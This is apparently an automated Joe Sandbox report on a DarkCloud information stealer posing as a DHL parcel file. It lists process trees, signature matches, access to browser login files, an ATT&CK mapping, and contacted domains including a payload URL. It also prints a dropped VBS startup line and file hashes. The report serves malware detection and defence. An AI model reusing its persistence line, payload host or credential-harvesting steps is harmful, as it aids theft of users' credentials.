Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Size.exe "C:\Users\user\AppData\Roaming\Size.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Queries volume information: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Queries volume information: C:\Users\user\AppData\Roaming\Size.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Size.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DarkCloud

Source: Yara match	File source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Size.exe.4379f48.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Size.exe.4379f48.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2110603697.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3287434454.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2310176986.000000000443C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2310176986.000000000433F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe PID: 6152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Size.exe PID: 6472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5340, type: MEMORYSTR

Yara detected Generic Dropper

Source: Yara match	File source: Process Memory Space: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe PID: 6152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Size.exe PID: 6472, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Remote Access Functionality

Yara detected DarkCloud

Source: Yara match	File source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Size.exe.4379f48.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Size.exe.4379f48.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2110603697.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3287434454.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2310176986.000000000443C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2310176986.000000000433F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe PID: 6152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Size.exe PID: 6472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5340, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	221 Windows Management Instrumentation	111 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	211 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	23 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Scheduled Task/Job	1 Scheduled Task/Job	21 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	2 Software Packing	NTDS	331 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	51 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	51 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	211 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	58%	ReversingLabs	Win32.Trojan.Generic
DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	34%	Virustotal		Browse
DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	100%	Avira	HEUR/AGEN.1309900
DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Size.exe	100%	Avira	HEUR/AGEN.1309900
C:\Users\user\AppData\Roaming\Size.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Size.exe	58%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
http://showip.net/3	0%	Avira URL Cloud	safe
http://showip.net/w	0%	Avira URL Cloud	safe
https://showip.net/	0%	Avira URL Cloud	safe
http://showip.net6D3	0%	Avira URL Cloud	safe
http://showip.net/r	0%	Avira URL Cloud	safe
http://showip.net/t	0%	Avira URL Cloud	safe
https://www.oleonidas.gr/slim/Xisav.wav	0%	Avira URL Cloud	safe
https://www.oleonidas.gr	0%	Avira URL Cloud	safe
http://showip.netth	0%	Avira URL Cloud	safe
https://showip.net/?checkip=	0%	Avira URL Cloud	safe
http://showip.netll	0%	Avira URL Cloud	safe
http://showip.net/(	0%	Avira URL Cloud	safe
http://showip.net/g	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
oleonidas.gr	185.78.221.73	true	false	unknown
showip.net	162.55.60.2	true	false	high
241.42.69.40.in-addr.arpa	unknown	unknown	false	high
www.oleonidas.gr	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.oleonidas.gr/slim/Xisav.wav	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1	InstallUtil.exe, 00000002.00000002.3288495105.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3289964413.0000000000E93000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3289833245.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3288495105.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3288495105.0000000000E29000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3289735627.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3288442045.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3288442045.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3291202922.0000000003B10000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3291202922.0000000003B17000.00000004.00000020.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2116558407.00000000066F0000.00000004.08000000.00040000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2097900919.000000000288C000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, Size.exe, 00000006.00000002.2293133444.000000000331C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2116558407.00000000066F0000.00000004.08000000.00040000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, Size.exe, 00000006.00000002.2310176986.0000000004A3D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://showip.net/	InstallUtil.exe, 00000007.00000002.3288442045.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://showip.net/w	InstallUtil.exe, 00000007.00000002.3288442045.0000000000E35000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://showip.net/t	InstallUtil.exe, 00000002.00000002.3288495105.0000000000E29000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://showip.net6D3	InstallUtil.exe, 00000002.00000002.3288495105.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://showip.net/3	InstallUtil.exe, 00000002.00000002.3288495105.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://showip.net/r	InstallUtil.exe, 00000002.00000002.3288495105.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://unpkg.com/leaflet	InstallUtil.exe, 00000007.00000002.3288442045.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2116558407.00000000066F0000.00000004.08000000.00040000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://showip.net/?checkip=	InstallUtil.exe, 00000007.00000002.3288442045.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.oleonidas.gr	DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2097900919.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Size.exe, 00000006.00000002.2293133444.0000000003271000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://showip.net/	InstallUtil.exe, 00000002.00000002.3288495105.0000000000E29000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3288442045.0000000000E35000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3288442045.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://showip.net	InstallUtil.exe, 00000002.00000002.3288495105.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3288442045.0000000000E35000.00000004.00000020.00020000.00000000.sdmp	false		high
http://showip.netth	InstallUtil.exe, 00000002.00000002.3288495105.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://showip.netll	InstallUtil.exe, 00000007.00000002.3288442045.0000000000E35000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schema.org	InstallUtil.exe, 00000007.00000002.3288442045.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-neti	DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2116558407.00000000066F0000.00000004.08000000.00040000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2116558407.00000000066F0000.00000004.08000000.00040000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2116558407.00000000066F0000.00000004.08000000.00040000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.openstreetmap.org/copyright	InstallUtil.exe, 00000007.00000002.3288442045.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.maxmind.com	InstallUtil.exe, 00000007.00000002.3288442045.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2097900919.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Size.exe, 00000006.00000002.2293133444.0000000003271000.00000004.00000800.00020000.00000000.sdmp	false		high
http://showip.net/(	InstallUtil.exe, 00000007.00000002.3288442045.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://showip.net/g	InstallUtil.exe, 00000007.00000002.3288442045.0000000000E35000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.78.221.73	oleonidas.gr	Greece		47521	IPHOSTGRIpDomainGR	false
162.55.60.2	showip.net	United States		35893	ACPCA	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1552675
Start date and time:	2024-11-09 09:19:30 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@8/5@3/2
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 93% Number of executed functions: 607 Number of non-executed functions: 40
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target InstallUtil.exe, PID 5340 because it is empty
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:20:20	API Interceptor	48x Sleep call for process: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe modified
03:20:40	API Interceptor	46x Sleep call for process: Size.exe modified
09:20:31	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Size.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.78.221.73	RFQ 4748.exe	Get hash	malicious	Snake Keylogger	Browse
185.78.221.73	PurchOrd_75238572.pdf.exe	Get hash	malicious	Snake Keylogger	Browse
162.55.60.2	7rxE4s9EEG.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	fS5TEjVseD.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	Nvojocm.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	Documentos_xlsm.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	SecuriteInfo.com.Win32.DropperX-gen.6684.1882.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	New PO678900__pif.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	Nuevo pedido URGENTE RFQ34543-23.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	ImDbHt7AA4.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	Order Catalog_____________pdf.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	Contrato.exe	Get hash	malicious	DarkCloud	Browse	showip.net/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
showip.net	7rxE4s9EEG.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	fS5TEjVseD.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	Nvojocm.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	Documentos_xlsm.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	SecuriteInfo.com.Win32.DropperX-gen.6684.1882.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	New PO678900__pif.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	Nuevo pedido URGENTE RFQ34543-23.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	ImDbHt7AA4.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	Order Catalog_____________pdf.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	Contrato.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ACPCA	7rxE4s9EEG.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	fS5TEjVseD.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	SDBARVe3d3.exe	Get hash	malicious	FormBook	Browse	162.0.211.143
	Nvojocm.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	Documentos_xlsm.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	pSU7fuySjo.elf	Get hash	malicious	Mirai, Moobot	Browse	162.37.65.173
	Hesap.exe	Get hash	malicious	FormBook	Browse	162.0.209.213
	SecuriteInfo.com.Win32.DropperX-gen.6684.1882.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	New PO678900__pif.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	icRicpJWczmiOf8.exe	Get hash	malicious	FormBook	Browse	162.0.211.143
IPHOSTGRIpDomainGR	RFQ 4748.exe	Get hash	malicious	Snake Keylogger	Browse	185.78.221.73
	PurchOrd_75238572.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	185.78.221.73
	433.docx.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.78.220.138
	https://ktima-edem.gr/gbzuv/?09812432	Get hash	malicious	Unknown	Browse	93.174.123.195
	https://andronikidis.gr/3nxw1/?31759481	Get hash	malicious	Unknown	Browse	93.174.123.207
	Prices_Required.exe	Get hash	malicious	DarkCloud	Browse	185.78.220.151
	pw5tgKfhDO.elf	Get hash	malicious	Mirai	Browse	185.78.220.47
	botx.arm.elf	Get hash	malicious	Unknown	Browse	185.78.220.23
	http://659jup6bicvl.zirino.com/c3VwcG9ydEBtb25vY2VyYS5jbw==	Get hash	malicious	Captcha Phish, HTMLPhisher	Browse	93.174.125.176
	http://659jup6bicvl.zirino.com/c3VwcG9ydEBtb25vY2VyYS5jbw==	Get hash	malicious	Captcha Phish	Browse	93.174.125.176

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Purchase_order08112024_pdf.vbs	Get hash	malicious	Unknown	Browse	185.78.221.73
	WMdKM7E5Yg.exe	Get hash	malicious	Quasar	Browse	185.78.221.73
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.78.221.73
	IsVcdKSMbE.exe	Get hash	malicious	Unknown	Browse	185.78.221.73
	IsVcdKSMbE.exe	Get hash	malicious	Unknown	Browse	185.78.221.73
	RFQ500005576.js	Get hash	malicious	AgentTesla	Browse	185.78.221.73
	system.exe	Get hash	malicious	Phemedrone Stealer	Browse	185.78.221.73
	pago de PEDIDO PROFORMA.exe	Get hash	malicious	AgentTesla	Browse	185.78.221.73
	fatura.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	185.78.221.73
	bG2aSZYhDR.bat	Get hash	malicious	Unknown	Browse	185.78.221.73

Process:	C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	80
Entropy (8bit):	4.7561983328100945
Encrypted:	false
SSDEEP:	3:FER/n0eFHHoUkh4EaKC5LuNnHn:FER/lFHI9aZ5LaH
MD5:	1C60E5D2CA0742C303588F65ECDF9037
SHA1:	94E490821FFE41243BAF1C25B69D58FBAFF7DA5A
SHA-256:	06CD8693032512AB49F00180FF231FA97574847608F94DED70A2A77F40997556
SHA-512:	DE85035AFD37E04D5F4D797052A0E5F44429EF879EAEC24D973DD1AE85452F4E92B9237FEE3341024154E2C5069BC4855ACFE03F27B5895AF4335938DB8023CA
Malicious:	true
Reputation:	low
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Size.exe"""

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\LogfirebasesMsNDblsEQMYcNOfhQJuUZQabadia

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\WebData

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
